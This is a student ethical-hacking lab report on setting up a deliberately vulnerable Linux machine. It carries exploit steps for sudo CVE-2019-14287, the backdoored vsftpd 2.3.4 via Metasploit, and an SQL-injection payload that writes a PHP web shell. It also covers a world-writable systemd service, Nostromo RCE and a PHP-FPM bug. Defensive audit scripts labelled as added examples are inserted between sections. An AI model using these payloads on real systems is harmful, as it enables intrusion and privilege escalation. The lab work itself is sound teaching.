Ethical Hacking

Alesci Gabriele, Mobilia Alessio, Tripoli Andrea 30/05/2020

SUDO Vulnerability

What is it and what is it for? Sudo, in computer science, is a program for Unix operating systems that, within particular constraints, allows you to run other programs assuming the identity of other users. Some systems, such as macOS, install SUDO natively, while on others (for example, Debian) it must be installed afterwards. The constraints within which SUDO runs programs are expressed in the /etc/sudoers configuration file, which is normally only editable by the root user: it defines the users who can execute commands via SUDO, the identities they can assume and the commands that they can perform, with any constraints on the parameters, with or without an authentication request.

Listing 1: Sample /etc/sudoers.

# This file MUST be edited with the 'visudo' command as root

Defaults env_reset
Defaults mail_badpass
Defaults secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin"

# User privilege specification
root ALL=(ALL:ALL) ALL

# Members of the admin group may gain root privileges
%admin ALL=(ALL) ALL

# Allow members of group sudo to execute any command
%sudo ALL=(ALL:ALL) ALL

#includedir /etc/sudoers.d

How safe is it to use SUDO? From a security point of view, it is necessary to keep in mind that, although it is possible to limit the commands and the related parameters, SUDO does not carry out any check on the integrity of the executable files that it is going to start. It is therefore important to make sure that they cannot be altered or replaced by non-privileged users, and in particular by those who run them via sudo: otherwise, the non-privileged user could alter these files in order to execute arbitrary code, and then execute them with the privileges granted via SUDO, effectively creating a security hole. This can be prevented, for example, through the permission mechanism of the file system.

What is the syntax for using SUDO? The general syntax of SUDO is as follows:

sudo [options] [variable1=value1 ...] [--] [command [arg1 ...]]

The optional command parameter indicates the command to be executed, and the arg parameters are its arguments. The optional double dash -- indicates that the subsequent parameters are not to be interpreted as options or variable assignments. Among the main options are:

• -u user Assumes the identity of user instead of root.

• -l Lists the commands that the current user can execute via SUDO.

• -s Starts the default shell for the user whose identity is assumed.

You can also access the shell as a root user by typing:

sudo su

What is the vulnerability that has been inserted and what is it for? The vulnerability that has been introduced into our system is better known as CVE-2019-14287, and its description reads:

In Sudo before 1.8.28, an attacker with access to a Runas ALL sudoer account can bypass certain policy blacklists and session PAM modules, and can cause incorrect logging, by invoking sudo with a crafted user ID. For example, this allows bypass of !root configuration, and USER= logging, for a "sudo -u #$((0xffffffff))" command.

This allows a user listed in the /etc/sudoers file to obtain root privileges by typing a particular sequence of symbols (with Sudo versions < 1.8.28).

How was it installed? To install SUDO version 1.8.21p2, you must first authenticate as root and uninstall the current version.

su -
apt-get remove sudo

Then you need to download the correct version of the file from the official website sudo.ws and extract it.

wget https://www.sudo.ws/dist/sudo-1.8.21p2.tar.gz
tar -xzf sudo-1.8.21p2.tar.gz

Now let's move on to building and installing sudo.

cd sudo-1.8.21p2
./configure
make
make check
checkinstall
dpkg -i name-of-package

For testing, check the current version that has been installed.

sudo --version

Now we need to add the user who will be able to exploit the vulnerability.

useradd -m -s /bin/bash user
passwd user

Now you need to edit the /etc/sudoers file using the visudo command (as root) and insert the permissions that the user user can obtain.

visudo

Defaults env_reset
Defaults mail_badpass
Defaults secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin"

# User privilege specification
root ALL=(ALL:ALL) ALL
user ALL=(ALL, !root) ALL

# Members of the admin group may gain root privileges
%admin ALL=(ALL) ALL

# Allow members of group sudo to execute any command
%sudo ALL=(ALL:ALL) ALL

#includedir /etc/sudoers.d

In this way we allow the user user to run any command as any user except root.

How do you perform the exploit? The vulnerability is simple to exploit: by inserting -u#-1 before the command to run, you obtain root privileges, as shown in Figure 1.
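From the defender's side, the bypass needs two things at once: an affected sudo version and a Runas spec of the "ALL, !root" shape shown above. The following audit script is an added example (not part of the report) that checks both on a constructed sudoers text; the regex accepts only the simple one-line user specifications used in this lab.

```python
import re

# Constructed sudoers text reproducing the lab entry (not the report's file).
SAMPLE_SUDOERS = """\
Defaults env_reset
root ALL=(ALL:ALL) ALL
user ALL=(ALL, !root) ALL
%sudo ALL=(ALL:ALL) ALL
#includedir /etc/sudoers.d
"""

# user-spec line: <who> <host>=(<runas users>[:<runas groups>]) <commands>
SPEC_RE = re.compile(r"^(?P<who>\S+)\s+(?P<host>\S+)=\((?P<runas>[^)]*)\)\s*(?P<cmds>.+)$")

def parse_version(v):
    """'1.8.21p2' -> (1, 8, 21, 2); a missing patch level counts as 0."""
    m = re.match(r"(\d+)\.(\d+)\.(\d+)(?:p(\d+))?", v)
    if not m:
        raise ValueError("unrecognised sudo version: %s" % v)
    return tuple(int(x or 0) for x in m.groups())

def version_affected(v):
    # CVE-2019-14287 is fixed in sudo 1.8.28
    return parse_version(v) < (1, 8, 28, 0)

def risky_runas_entries(text):
    """Return (who, runas) for entries whose Runas user list is ALL minus
    some users: the 'ALL, !root' shape the crafted user ID defeats."""
    hits = []
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("#"):          # comment or #include directive
            continue
        m = SPEC_RE.match(line)
        if not m:
            continue
        runas_users = m.group("runas").split(":")[0]
        items = [i.strip() for i in runas_users.split(",")]
        if "ALL" in items and any(i.startswith("!") for i in items):
            hits.append((m.group("who"), m.group("runas")))
    return hits

def audit(text, version):
    hits = risky_runas_entries(text)
    return {"version_affected": version_affected(version),
            "risky_entries": hits,
            "exploitable": version_affected(version) and bool(hits)}
```

Feed it the real file and the output of sudo --version to confirm that upgrading to 1.8.28 or rewriting the Runas list closes the hole.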

Figure 1: Sudo exploit

vsftpd Vulnerability

What is it and what is it for? vsftpd (very secure FTP daemon) is an FTP server for Unix-like systems, including Linux. It is the default FTP server in the Ubuntu, CentOS, Fedora, NimbleX, and RHEL Linux distributions. vsftpd enables the transfer of files from one computer to another. FTP is a way to transfer files to any computer in the world that is connected to the internet.

How safe is it to use vsftpd? vsftpd is currently safe, but in July 2011 it was discovered that the vsftpd version 2.3.4 downloadable from the master site had been compromised. Users logging into a compromised vsftpd-2.3.4 server could issue a ":)" smiley face as the username and gain a command shell on port 6200. This was not a security hole in vsftpd itself: an unknown attacker had uploaded a different version of vsftpd which contained a backdoor. Since then, the site has been moved to Google App Engine.

What is the vulnerability that has been inserted? The vulnerability inserted into the system, as previously mentioned, is vsftpd-2.3.4 (with its backdoor), to allow local access.

Why choose vsftpd? We opted for the vsftpd vulnerability rather than the 1.3.5 vulnerability (which we also tested) since it was better incorporated into our system (regarding libraries and dependencies).

How was it installed? To install vsftpd version 2.3.4, you must first authenticate as root and uninstall the current version (if it was installed). Then download the package with the backdoor and start the configuration.

git clone https://github.com/nikdubois/vsftpd-2.3.4-infected
mv vsftpd-2.3.4-infected vsftpd
cd vsftpd

Before starting the build, edit the Makefile, as it had problems with the libraries.

nano Makefile

LIBS = `./vsf_findlibs.sh` -lcrypt

Then you can start the compilation.

make

useradd nobody
mkdir /usr/share/empty/
mkdir /var/ftp
useradd -d /var/ftp ftp
chown root.root /var/ftp
chmod og-w /var/ftp

cd /usr/local/man
mkdir man5
mkdir man8
cd /home/eth/vsftpd
cp vsftpd /usr/local/sbin/vsftpd
cp vsftpd.conf.5 /usr/local/man/man5
cp vsftpd.8 /usr/local/man/man8

make install

cp vsftpd.conf /etc

Now let's edit the vsftpd configuration file /etc/vsftpd.conf.

Listing 2: Sample /etc/vsftpd.conf.

anonymous_enable=NO
local_enable=YES
write_enable=YES
dirmessage_enable=YES
xferlog_enable=YES
connect_from_port_20=YES

listen=YES

Then, set /bin/bash as the login shell in the /etc/passwd file for the user created earlier. Now you can start the vsftpd daemon with the following command.

sudo /usr/local/sbin/vsftpd &

How do you perform the exploit? It is possible to exploit vsftpd using the Metasploit tools:

search vsftpd
use exploit/unix/ftp/vsftpd_234_backdoor
set payload cmd/unix/interact
set RHOSTS
exploit

Local access has now been obtained, and you will be able to perform operations to obtain more privileges (Figure 2).

Figure 2: Sudo exploit

Vulnerable Website

What is a Website and what is it for? The most common publicly accessible servers are web servers, so a website that uses a simple MySQL database to store news has been designed in PHP and JavaScript. It is named INPS news, winking at recent events, and it is shown in Figure 3.

Figure 3: Website

The vulnerability is in the PHP code. The input values are neither checked nor sanitized, and they are concatenated directly into the SQL query. There are different ways to use this vulnerability, such as injecting code in the URL or in the different input fields of the site. The SQL injection makes it possible to grab the passwords of the database users and of the admin. But the most serious use is to inject a PHP shell directly onto the server and then browse to it: in this way a user can obtain a shell and log in as the user www-data. To make this possible we have disabled some security features. We have disabled the AppArmor profile of MySQL. We granted the database root user the right to write files and added www-data to the same group as mysql, so the Apache web server can read the files created by the mysql user.

How do you perform the exploit? The vulnerability was tested in different ways. In this section a way to obtain the root shell is described. After testing how the site responds to different inputs, you can understand how to inject the web shell. One possibility is to inject it in the id field of the news in the URL.

shell injection

http:///news-details.php?nid=12' UNION SELECT 1,2,3,4,"",6,7,8 into outfile "/var/www/html/shell.php" -- -

After that you can browse the shell and use it as the user www-data.

shell test

http:///shell.php?cmd=whoami

Figure 4: Shell result "whoami"
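To make the root cause concrete, here is an added example (not the report's PHP code) that mirrors the news lookup in Python against an in-memory sqlite stand-in for the lab's MySQL table. The vulnerable function pastes the request value into the SQL text, as the page's news-details.php does; the fixed function binds it as a parameter, so the same UNION payload (without INTO OUTFILE, which sqlite lacks) simply matches no row.

```python
import sqlite3

def make_db():
    # Constructed stand-in for the lab's news and user tables (not the real schema).
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (nid INTEGER, title TEXT, body TEXT)")
    conn.execute("CREATE TABLE users (id INTEGER, name TEXT, password TEXT)")
    conn.execute("INSERT INTO news VALUES (12, 'Lab news', 'hello')")
    conn.execute("INSERT INTO users VALUES (1, 'admin', 'constructed-hash')")
    return conn

def news_details_vulnerable(conn, nid):
    # The page's bug: the request value becomes part of the SQL statement text,
    # so a quote in it ends the literal and the rest is parsed as SQL.
    sql = "SELECT nid, title, body FROM news WHERE nid = '" + nid + "'"
    return conn.execute(sql).fetchall()

def news_details_fixed(conn, nid):
    # Parameterised query: the value is bound by the driver and never parsed as SQL.
    sql = "SELECT nid, title, body FROM news WHERE nid = ?"
    return conn.execute(sql, (nid,)).fetchall()

# Same shape as the page's payload: close the literal, UNION in another table,
# comment out the trailing quote. Constructed for the demo.
PAYLOAD = "12' UNION SELECT id, name, password FROM users -- "

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", news_details_vulnerable(db, PAYLOAD))  # two rows, one leaked
    print("fixed:     ", news_details_fixed(db, PAYLOAD))       # no rows
```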

Misconfigured service

What is Systemd and what is it for? Systemd is a suite of basic building blocks for a Linux system. It provides a system and service manager that runs as PID 1 and starts the rest of the system. The main command used to introspect and control systemd is systemctl. Some of its uses are examining the system state and managing the system and services. With systemctl the system administrator can handle the services in an easy way. It is common to find custom scripts managed by systemd. A unit is a resource that systemd can operate on and manage. Each unit has a configuration file known as a unit file. The suffix of the unit file indicates for which type of unit the file stores configuration information. Systemd unit files created, or customized, by the system administrator are located in the directory /etc/systemd/system/. In this case a service, vulnerable.service, starts the execution of a simple script that continuously sends UDP packets in broadcast.

vulnerable.service

[Unit]
Description=super secure service

[Service]
Type=simple
Restart=always
RestartSec=1
ExecStart=/usr/bin/bash /etc/script.sh

[Install]
WantedBy=multi-user.target

script.sh

for (( ; ; ))
do
    echo "Sono un servizio mal configurato" > /dev/udp/255.255.255.0/3000
    sleep 2
done

How do you perform the exploit? The vulnerability lies in the bad management of permissions by the administrator. For example, to allow other users or automated scripts to modify the service, the admin could have run the command "chmod 777 vulnerable.service". In this way every user can modify the file, and therefore has the possibility to execute shell commands as the root user: it is enough to modify the service file so that it executes a custom script, which will run with root privileges.
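The administrator-side check for this misconfiguration is a permissions audit of each unit file and of every path named on its Exec* lines (here the interpreter and /etc/script.sh). The script below is an added example, not part of the report; demo() builds the lab layout in a temporary directory with whatever modes you pass, since the real /etc/systemd/system/ is not touched.

```python
import os
import re
import stat
import tempfile

EXEC_RE = re.compile(r"^Exec(?:Start|StartPre|StartPost|Stop|Reload)=[-@+!:]*(\S+)(?:\s+(\S+))?")

def writable_by_others(path):
    """True when group or world have write permission on path."""
    return bool(os.stat(path).st_mode & (stat.S_IWGRP | stat.S_IWOTH))

def audit_unit(unit_path):
    """Flag a unit file, and the interpreter/script its Exec* lines run,
    when any of them is group or world writable (what chmod 777 produces)."""
    findings = []
    if writable_by_others(unit_path):
        findings.append(("unit-writable", unit_path))
    with open(unit_path) as f:
        for line in f:
            m = EXEC_RE.match(line.strip())
            if not m:
                continue
            # e.g. ExecStart=/usr/bin/bash /etc/script.sh: check both paths
            for target in m.groups():
                if target and os.path.isabs(target) and os.path.exists(target) \
                        and writable_by_others(target):
                    findings.append(("exec-target-writable", target))
    return findings

def demo(unit_mode, script_mode):
    """Constructed lab layout in a temp dir; returns the kinds of findings."""
    d = tempfile.mkdtemp()
    script = os.path.join(d, "script.sh")
    with open(script, "w") as f:
        f.write("#!/bin/bash\nsleep 2\n")
    os.chmod(script, script_mode)
    unit = os.path.join(d, "vulnerable.service")
    with open(unit, "w") as f:
        f.write("[Service]\nExecStart=/usr/bin/bash %s\n" % script)
    os.chmod(unit, unit_mode)
    return [kind for kind, _ in audit_unit(unit)]
```

Running audit_unit over every file in /etc/systemd/system/ turns the one-off mistake described above into something a cron job catches the same day.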

1 Nostromo 1.9.6

It is not so unusual to have different web servers on the same machine: it makes it possible to have different test environments and to compare performance across web servers.

What is Nostromo and what is it for? Nostromo (nhttpd) is a simple and fast HTTP server. It runs as a single process and handles normal concurrent connections with select calls, but for efficiency, during more demanding connections such as directory listings and CGI execution, it forks. Public access is controlled using the world-readable flags, and CGI execution by the world-executable flags, of the file system permissions.

How do you perform the exploit? Directory traversal in the function http_verify in Nostromo nhttpd through 1.9.6 allows an attacker to achieve remote code execution via a crafted HTTP request. This is a known vulnerability and it is exploitable by running a Python script available on exploit-db.com (Figure 5).

Figure 5: Nostromo Exploit

2 Nginx 1.17 + Php 7.2.10 (Php-fpm bug)

What is Nginx and what is it for? Nginx is a very popular web server capable of dealing with high traffic; in this configuration it is backed by php-fpm to serve PHP scripts. Php-fpm (FastCGI process manager) is used to serve applications that require the PHP runtime, such as web forums or login gateways, while the web server returns HTML, JavaScript, and other non-PHP content. In our case Nginx will be listening on port 8081 and will simply serve a page index.php. The vulnerability lies in the nginx.conf file: a common configuration for nginx when dealing with PHP is having a location entry with the directive

fastcgi_split_path_info ^(.+?\.php)(/.*)$;

When someone makes a request to nginx:

http://my.server/index.php/XXXXX

the XXXXX part is matched by the second group of the regexp and passed to php-fpm as the PATH_INFO variable.

config

server {
    listen 80;

    index index.php index.html index.htm;
    ...
    location ~ [^/]\.php(/|$) {

        fastcgi_split_path_info ^(.+?\.php)(/.*)$;

        include fastcgi_params;
        ....
        fastcgi_param PATH_INFO $fastcgi_path_info;
    }
}

The regular expression ^(.+?\.php)(/.*)$ does not match \n, and it will break if an encoded newline %0a is added to the URI. When that happens the PATH_INFO variable is empty, while the unpatched PHP version assumes that env_path_info always contains a value. The vulnerability is caused by this lack of validation; adding a try_files directive to the nginx location would prevent the exploit, because requests for non-existent scripts are rejected before they reach php-fpm.
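The two points above, as an added example not taken from the report: split_path_info() applies the page's regexp to a decoded URI and shows that the %0a variant yields no match (hence an empty PATH_INFO), and locations_missing_try_files() scans nginx location blocks for the weak shape. The WEAK and FIXED fragments are constructed from the page's config; the parser handles only flat location blocks without nested braces.

```python
import re
import urllib.parse

# The page's fastcgi_split_path_info regexp, applied to the decoded URI.
SPLIT_RE = re.compile(r"^(.+?\.php)(/.*)$")

def split_path_info(uri):
    """Return (script_name, path_info) or None when the regexp does not match."""
    m = SPLIT_RE.match(urllib.parse.unquote(uri))
    return m.groups() if m else None

# Constructed fragments: the weak location block and one with try_files added.
WEAK = """
location ~ [^/]\\.php(/|$) {
    fastcgi_split_path_info ^(.+?\\.php)(/.*)$;
    include fastcgi_params;
    fastcgi_param PATH_INFO $fastcgi_path_info;
}
"""
FIXED = """
location ~ [^/]\\.php(/|$) {
    fastcgi_split_path_info ^(.+?\\.php)(/.*)$;
    try_files $fastcgi_script_name =404;
    include fastcgi_params;
    fastcgi_param PATH_INFO $fastcgi_path_info;
}
"""

# Flat location blocks only (matcher, then body up to the closing brace).
LOCATION_RE = re.compile(r"location\s+([^{]+)\{(.*?)\n\}", re.S)

def locations_missing_try_files(conf):
    """Matchers of location blocks that split PATH_INFO for FastCGI
    but never verify that the script exists with try_files."""
    bad = []
    for m in LOCATION_RE.finditer(conf):
        matcher, body = m.group(1).strip(), m.group(2)
        if "fastcgi_split_path_info" in body and "try_files" not in body:
            bad.append(matcher)
    return bad
```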

How do you perform the exploit? The attacker can send a specially crafted HTTP GET request with the code to be injected ("`$_GET[a]`?>") after the newline character %0A. The URI should be around 2000 bytes so that the FPM module writes past the allocated buffers into the space reserved for FCGI protocol data, opening the possibility of remote code execution. Once the bug is exploited, a permanent web shell is accessible through the parameter a at the end of the URI (for example http://my.server/index.php/?a=ls /&), as shown in Figure 6.

Figure 6: fpm exploit

The exploit is also available as a Go program on exploit-db.
